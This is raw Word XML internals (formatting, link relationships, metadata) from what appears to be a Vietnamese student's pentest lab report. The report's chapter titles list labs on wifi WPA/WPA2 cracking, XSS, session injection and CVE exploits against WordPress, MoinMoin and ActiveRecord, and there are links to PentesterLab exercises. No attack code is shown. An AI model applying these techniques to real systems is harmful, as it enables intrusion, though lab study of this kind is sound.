  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004653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6077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="478159344">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="887188542">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="949552707">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="543949827">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="581718226">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="709263123">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="906066664">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1362901146">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1915360779">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2037847090">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="300"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1012491711">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1077291816">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1079522595">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1105727623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1137527221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1162432784">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1266576604">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1384021514">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1527601683">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1550453737">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1651441925">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1745569874">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1843857203">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1904021512">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1944678551">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1978415286">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2082020290">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2135325595">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21404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5.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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www.pentesterlab.com/exercises/play_session_injection/course" TargetMode="External"/><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5.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pentesterlab.com/exercises/play_session_injection/cours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hyperlink" Target="http://192.168.111.142/authorization/example1/infos/1" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.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6.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1HkI7lHwVhQR1Pe2_casV0VxaE_F1hgt7/view?usp=sharing"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5.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pentesterlab.com/exercises/play_session_injection/course" TargetMode="External"/><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6.png"/><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image" Target="media/image243.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260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.python.org/downloads/release/python-390/" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image240.png"/><Relationship Id="rId281"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hyperlink" Target="https://pentesterlab.com/exercises/cve-2012-6081/course?fbclid=IwAR2TzyWX79JD_8X03c24SAR1DU7qcz7-x4v2ORjUz23V7h_ma_x_4zYY0o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4.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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hyperlink" Target="http://192.168.111.142/sqlinjection/example7/?id=1" TargetMode="External"/><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0.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3.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1p9GK9ieS9ozEbrd_iKdhKxYWjl2MwEgj/view?usp=sharing" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image241.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282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///E:\desktop\STUDY\SV\Desktop\MYHANH\tai%20lieu%20huong%20dan%20LV%20Th%20Si%20ke%20toan\cac%20phu%20luc%20LV.doc"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hyperlink" Target="mailto:tranlethienphuc99@gmail.com" TargetMode="External"/><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29.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentesterlab.com/exercises/rack_cookies_and_commands_injection/course?fbclid=IwAR2ZF0gwSscGd_0_yMA-tZyCJJtzbokxUTSAlxo8FKiIVC7eE5P-nHOY8Tk" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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image" Target="media/image2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hyperlink" Target="https://pentesterlab.com/exercises/cve-2008-1930/course?fbclid=IwAR2AHY4xWlP0Kc1ia9bBecmfTgUCDktg2vY2Vg-1inHSHVozJd8SIp_w6kI" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.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4.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubyinstaller.org/download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3.png"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image237.png"/><Relationship Id="rId283"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file:///E:\desktop\STUDY\SV\Desktop\MYHANH\tai%20lieu%20huong%20dan%20LV%20Th%20Si%20ke%20toan\cac%20phu%20luc%20LV.doc"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4.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentesterlab.com/exercises/xss_and_mysql_file/course?fbclid=IwAR3SqJOwvpsVd3OD6kWN4DiwtS6Bdo5O8tfyruDY5_MvNEKsB3V7Tmqb6h0" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image211.png"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1agFkx9c68TM6fxlyct-OJS2nzku9fupf/view?usp=sharing"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8.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image180.png"/><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3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1.png"/><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hyperlink" Target="http://192.168.111.142/sqlinjection/example7/?id=1" TargetMode="External"/><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pentesterlab.com/exercises/linux_host_review/course?fbclid=IwAR0j3GFLkcZnvO2d-aeUIpN-RrpVd7J8btM_FRg_Fy-0eKA9koWaFErqLvg"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hyperlink" Target="https://pentesterlab.com/exercises/cve-2012-2661/course" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image239.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s://pentesterlab.com/exercises/xss_and_mysql_file/course?fbclid=IwAR3SqJOwvpsVd3OD6kWN4DiwtS6Bdo5O8tfyruDY5_MvNEKsB3V7Tmqb6h0" TargetMode="External"/><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hyperlink" Target="https://pentesterlab.com/exercises/web_for_pentester_II/course?fbclid=IwAR3LWvfXtKkUhBk7uH3_lNlyiz42vtKrEgaWJ8NbU9qAjQPCYpKCaXs99S4" TargetMode="External"/><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the.earth.li/~sgtatham/putty/latest/w64/putty.exe"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hyperlink" Target="https://the.earth.li/~sgtatham/putty/latest/w64/putty.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DEE2-3745-1D47-B726-B9ABD8D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2</Pages>
  <Words>11304</Words>
  <Characters>64439</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>536</Lines>
  <Paragraphs>1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TRƯỜNG ĐẠI HỌC KỸ THUẬT CÔNG NGHỆ TP</vt:lpstr>
      <vt:lpstr>MỤC LỤC</vt:lpstr>
      <vt:lpstr>CHƯƠNG I: HƯỚNG DẪN CÀI ĐẶT</vt:lpstr>
      <vt:lpstr>CHƯƠNG II: THƯC HIỆN CÁC BÀI LAB PENTESTER</vt:lpstr>
      <vt:lpstr>    LAB 1:  Hack password wifi WPA/WPA2</vt:lpstr>
      <vt:lpstr>        1 Giới thiệu</vt:lpstr>
      <vt:lpstr>        2.Khai thác</vt:lpstr>
      <vt:lpstr>    LAB 2: XXS and MySQL FILE</vt:lpstr>
      <vt:lpstr>        1.Giới thiệu</vt:lpstr>
      <vt:lpstr>        2.Khai thác</vt:lpstr>
      <vt:lpstr>    LAB 3: PLAY SESSION INJECTION</vt:lpstr>
      <vt:lpstr>        1.Giới thiệu</vt:lpstr>
      <vt:lpstr>        2.Khai thác</vt:lpstr>
      <vt:lpstr>    LAB 4: Web for Pentester II</vt:lpstr>
      <vt:lpstr>        1.Giới thiệu</vt:lpstr>
      <vt:lpstr>        2.Khai thác</vt:lpstr>
      <vt:lpstr>    LAB 5: CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability</vt:lpstr>
      <vt:lpstr>        1.Giới thiệu</vt:lpstr>
      <vt:lpstr>        2.Khai thác</vt:lpstr>
      <vt:lpstr>    LAB 6: CVE-2012-6081: MoinMoin code execution</vt:lpstr>
      <vt:lpstr>        1.Giới thiệu:</vt:lpstr>
      <vt:lpstr>        2.Khai Thác:</vt:lpstr>
      <vt:lpstr>    LAB 7: Linux Host Review</vt:lpstr>
      <vt:lpstr>        1.Giới thiệu</vt:lpstr>
      <vt:lpstr>        2.Khai thác</vt:lpstr>
      <vt:lpstr>    LAB 8: CVE-2012-2661: ActiveRecord SQL injection</vt:lpstr>
      <vt:lpstr>        1.Giới thiệu:</vt:lpstr>
      <vt:lpstr>        2.Khai thác:</vt:lpstr>
      <vt:lpstr>    LAB 9: Rack Cookies and Commands injection</vt:lpstr>
      <vt:lpstr>        1.Giới thiệu:</vt:lpstr>
      <vt:lpstr>        2.Khai thác:</vt:lpstr>
      <vt:lpstr>TÀI LIỆU THAM KHẢO</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>75592</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="42" baseType="variant">
      <vt:variant>
        <vt:i4>4849731</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>24</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://viettuts.vn/lap-trinh-mang-voi-java/giao-thuc-udp</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6881312</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>21</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://hostingviet.vn/socket-la-gi</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4784147</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>18</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://vi.wikipedia.org/wiki/TCP</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>851991</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>15</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://pentesterlab.com/exercises/cve-2012-6081/course?fbclid=IwAR2TzyWX79JD_8X03c24SAR1DU7qcz7-x4v2ORjUz23V7h_ma_x_4zYY0oE</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>3342403</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>11</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>../SV/Desktop/MYHANH/tai lieu huong dan LV Th Si ke toan/cac phu luc LV.doc</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc357225424</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276868</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>../SV/Desktop/MYHANH/tai lieu huong dan LV Th Si ke toan/cac phu luc LV.doc</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc357225330</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>3276868</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>../SV/Desktop/MYHANH/tai lieu huong dan LV Th Si ke toan/cac phu luc LV.doc</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc35722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subject/>
  <dc:creator>TRAN LE THIEN PHUC</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>TRAN LE THIEN PHUC</cp:lastModifiedBy>
  <cp:revision>91</cp:revision>
  <cp:lastPrinted>2014-01-13T02:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-22T10:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-06T12:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>